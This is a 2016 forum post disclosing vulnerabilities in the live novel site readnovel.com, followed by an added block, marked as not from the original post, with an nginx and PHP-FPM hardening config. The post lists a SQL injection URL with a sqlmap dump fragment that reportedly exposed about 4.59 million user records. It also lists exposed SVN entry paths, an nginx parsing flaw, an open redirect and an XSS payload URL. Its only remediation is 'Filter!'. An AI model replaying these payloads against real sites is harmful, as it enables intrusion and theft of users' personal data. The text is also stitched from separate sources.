HanDs
Administrator

[July vulnerability disclosure] Readnovel (小说阅读网) vulnerability bundle / 400w (4 million) user records affected



As the title says.

Details:

http://a.readnovel.com/usericon.php?a=load_icon_js&id=45619122,57738912,14444201,13089209,60299748,60299748,27913735,49165864,60308247,4010667,30284734,30284734,4010667,58931113,56685425,12843058,11121284,13429340,60010973,14846534

--dump -D newuc -T user_info

| user_info | 4590267 |



SVN:

<svn_entries> http://event.readnovel.com/RNfljh/.svn/entries

<svn_entries> http://event.readnovel.com/rnenter/.svn/entries



nginx parsing vulnerability:

http://free.readnovel.com/robots.txt/a.php

http://www.readnovel.com/robots.txt/a.php



URL redirect:

http://www.readnovel.com/friendlink.php?url=http%3A%2F%2Fwww.gov.cn%2F%3F1463749061.37



XSS:

http://big.readnovel.com/search?ranker=ranker&keyword=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&finish_flag=finish_flag&publisherid=1finish_flag

Proof:

[screenshot image, not preserved]

Remediation:

Filter!
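For the nginx parsing issue listed above (a request like `/robots.txt/a.php` being handed to PHP-FPM, which then executes `robots.txt` as PHP), here is an added remediation example that is not part of the original post: an nginx PHP `location` block that refuses requests whose script file does not actually exist, plus the PHP-FPM and php.ini settings that stop non-`.php` files from being executed. The socket path and file locations are assumed placeholders.

```nginx
# Added example (not from the original post): harden the PHP handler so that
# /robots.txt/a.php is never interpreted as a PHP script.
location ~ \.php$ {
    # Return 404 unless the requested path exists as a file on disk.
    # Without this, "/robots.txt/a.php" reaches PHP-FPM, and with the
    # default cgi.fix_pathinfo=1 PHP walks back to robots.txt and runs it.
    try_files $uri =404;

    fastcgi_split_path_info ^(.+\.php)(/.+)$;
    fastcgi_pass unix:/run/php-fpm.sock;   # placeholder socket path
    fastcgi_index index.php;
    include fastcgi_params;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
}

# Defence in depth, in the PHP-FPM pool file (e.g. www.conf, placeholder path):
# only execute files whose extension is .php, whatever nginx forwards.
#   security.limit_extensions = .php
#
# And in php.ini: do not let PHP "repair" a script path that points at a
# non-existent file by trimming trailing path segments.
#   cgi.fix_pathinfo = 0
```

After applying this, a request for `/robots.txt/a.php` answers 404 instead of being executed, while `/index.php` and other real scripts keep working.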


Post #1
Posted: 2016-7-9   |   Views: 0   |   Replies: 0